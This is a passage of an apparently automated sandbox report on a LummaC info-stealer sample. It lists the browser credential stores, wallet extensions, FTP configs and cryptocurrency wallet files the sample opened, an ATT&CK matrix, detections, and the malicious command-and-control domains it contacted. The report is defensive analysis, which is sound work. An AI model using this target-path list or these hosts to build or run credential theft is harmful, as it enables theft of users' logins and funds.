                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2209553671.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MaZjv5XeQi.exe PID: 5608, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: MaZjv5XeQi.exe PID: 5608, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory851
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                MaZjv5XeQi.exe63%ReversingLabsWin32.Trojan.Symmi
                MaZjv5XeQi.exe100%AviraTR/Crypt.XPACK.Gen
                MaZjv5XeQi.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/u100%Avira URL Cloudmalware
                https://lev-tolstoi.com/MSWznTY69wwRW38B95y2100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apih3100%Avira URL Cloudmalware
                https://checkout.steampow0%Avira URL Cloudsafe
                https://lev-tolstoi.com/api0GUP100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apia3100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apixI100%Avira URL Cloudmalware
                https://steambroadcast-test.akamaizedH0%Avira URL Cloudsafe
                https://cdn.fastly.(0%Avira URL Cloudsafe
                https://lev-tolstoi.com/PPL100%Avira URL Cloudmalware
                https://lev-tolstoi.com/MSWznTY69wwRW38B95100%Avira URL Cloudmalware
                https://lev-tolstoi.com/MSWznTY69wwRW38B95-100%Avira URL Cloudmalware
                https://lev-tolstoi.com/V4100%Avira URL Cloudmalware
                https://lev-tolstoi.com/piy7100%Avira URL Cloudmalware
                https://login.steamp0%Avira URL Cloudsafe
                https://lev-tolstoi.com/WC100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apis100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		104.102.49.254
                		truefalse
                  		high
                  lev-tolstoi.com
                  		104.21.66.86
                  		truefalse
                    		high
                    wordyfindy.lat
                    		unknown
                    		unknownfalse
                      		high
                      slipperyloo.lat
                      		unknown
                      		unknownfalse
                        		high
                        curverpluch.lat
                        		unknown
                        		unknownfalse
                          		high
                          tentabatte.lat
                          		unknown
                          		unknownfalse
                            		high
                            manyrestro.lat
                            		unknown
                            		unknownfalse
                              		high
                              bashfulacid.lat
                              		unknown
                              		unknownfalse
                                		high
                                shapestickyr.lat
                                		unknown
                                		unknownfalse
                                  		high
                                  observerfry.lat
                                  		unknown
                                  		unknownfalse
                                    		high
                                    talkynicer.lat
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      slipperyloo.latfalse
                                        		high
                                        observerfry.latfalse
                                          		high
                                          https://steamcommunity.com/profiles/76561199724331900false
                                            		high
                                            https://lev-tolstoi.com/apifalse
                                              		high
                                              curverpluch.latfalse
                                                		high
                                                tentabatte.latfalse
                                                  		high
                                                  manyrestro.latfalse
                                                    		high
                                                    bashfulacid.latfalse
                                                      		high

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/chrome_newtabMaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://lev-tolstoi.com/uMaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://steamcommunity.com/?subsection=broadcastsMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://store.steampowered.com/subscriber_agreement/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://lev-tolstoi.com/MSWznTY69wwRW38B95y2MaZjv5XeQi.exe, 00000000.00000003.2180876019.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2180972685.00000000057AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.valvesoftware.com/legal.htmMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.youtube.comMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.google.comMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://lev-tolstoi.com/UMaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://s.ytimg.com;MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lev-tolstoi.com/api0GUPMaZjv5XeQi.exe, 00000000.00000003.2180876019.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2180972685.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2181402365.00000000057AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://steam.tv/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://steambroadcast-test.akamaizedHMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lev-tolstoi.com/MaZjv5XeQi.exe, 00000000.00000003.2240279376.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://store.steampowered.com/privacy_agreement/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://store.steampowered.com/points/shop/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://lev-tolstoi.com/PPLMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://lev-tolstoi.com/apia3MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                http://ocsp.rootca1.amazontrust.com0:MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
